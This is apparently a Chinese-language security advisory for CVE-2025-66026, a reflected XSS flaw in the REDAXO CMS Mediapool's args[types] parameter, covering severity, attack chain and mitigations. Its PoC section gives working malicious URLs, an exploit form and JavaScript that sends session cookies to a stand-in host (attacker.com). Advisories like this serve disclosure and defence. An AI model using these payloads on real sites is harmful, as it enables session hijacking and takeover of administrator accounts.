REDAXO CMS Mediapool反射型XSS漏洞 (CVE-2025-66026)

漏洞信息

漏洞编号

CVE-2025-66026

漏洞类型

反射型XSS

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

REDAXO CMS

漏洞概述

REDAXO是一款基于PHP开发的内容管理系统（CMS），广泛应用于各类网站构建。在5.20.1之前的版本中，其Mediapool（媒体库）功能存在一处反射型跨站脚本（XSS）漏洞。该漏洞源于请求参数args[types]在渲染到页面信息横幅时未经过充分的HTML转义处理，导致攻击者可以在页面中注入任意JavaScript代码。由于该漏洞存在于后台管理界面，当已认证的管理员或用户访问攻击者精心构造的恶意链接时，恶意脚本将在用户浏览器中执行，可能导致会话劫持、敏感信息窃取、管理后台权限滥用等严重安全问题。攻击复杂度较低，但需要用户交互（点击恶意链接），攻击者可利用此漏洞在目标用户的上下文中执行任意操作。

技术细节

该漏洞为经典的反射型XSS（Non-Persistent XSS）漏洞。在REDAXO CMS的Mediapool模块中，程序接收用户通过URL传递的args[types]参数，并直接将该参数值嵌入到页面DOM中进行展示。问题在于后端在处理该参数时未进行HTML实体编码（如将<、>、"、'等特殊字符转换为HTML实体），导致攻击者可以通过构造包含JavaScript代码的恶意URL来注入脚本。当用户访问包含恶意代码的URL时，浏览器会将其解析为JavaScript并执行。攻击者通常会通过钓鱼邮件、社交工程等方式诱骗已登录用户访问恶意链接。恶意脚本可以获取用户的会话Cookie、模拟用户操作、窃取页面敏感数据或进行进一步的内网渗透。由于攻击发生在后台管理界面，攻击成功后可获取管理员权限，对整个网站造成严重威胁。

攻击链分析

STEP 1

步骤1

攻击者构造包含恶意JavaScript代码的URL，将payload放置在args[types]参数中，如'><script>alert(document.cookie)</script>

STEP 2

步骤2

攻击者通过钓鱼邮件、即时通讯或社交工程等方式诱骗已登录的REDAXO后台用户访问该恶意链接

STEP 3

步骤3

用户浏览器发送请求到REDAXO服务器，服务器将args[types]参数值未经过滤地嵌入到Mediapool页面的响应中

STEP 4

步骤4

用户浏览器接收到包含恶意脚本的HTML响应，将其解析并执行注入的JavaScript代码

STEP 5

步骤5

恶意脚本在用户上下文中执行，可窃取会话Cookie、获取用户权限、执行任意操作或进行横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-66026 PoC - REDAXO CMS Mediapool Reflected XSS -->
<!-- Target: REDAXO CMS < 5.20.1 -->
<!-- Attack Vector: args[types] parameter in Mediapool view -->

<!-- Malicious URL PoC -->
<!--
https://[TARGET_URL]/redaxo/index.php?page=mediapool/media&args[types]=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
-->

<!-- Alternative PoC with event handler (bypasses some filters) -->
<!--
https://[TARGET_URL]/redaxo/index.php?page=mediapool/media&args[types]=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E
-->

<!-- HTML Form for exploitation -->
<form action="https://[TARGET_URL]/redaxo/index.php" method="GET">
    <input type="hidden" name="page" value="mediapool/media">
    <input type="hidden" name="args[types]" value='"><script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>'>
    <input type="submit" value="Click to exploit">
</form>

<!-- JavaScript payload for session hijacking -->
<script>
    // Steal session cookies
    var cookies = document.cookie;
    fetch('https://attacker.com/log?data=' + encodeURIComponent(cookies));
    
    // Or perform actions as the logged-in user
    // fetch('https://[TARGET_URL]/redaxo/index.php?page=users/users&func=add', {credentials: 'include'});
</script>

影响范围

REDAXO CMS < 5.20.1

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 在Web应用防火墙（WAF）层面配置规则，拦截包含可疑XSS payload的请求参数；2) 临时禁用Mediapool模块的非必要功能；3) 加强对后台管理员的安全培训，提醒不要点击未知来源的链接；4) 实施严格的输入验证和白名单机制；5) 监控Web服务器日志，关注异常的请求模式。建议尽快完成版本升级以彻底消除该漏洞风险。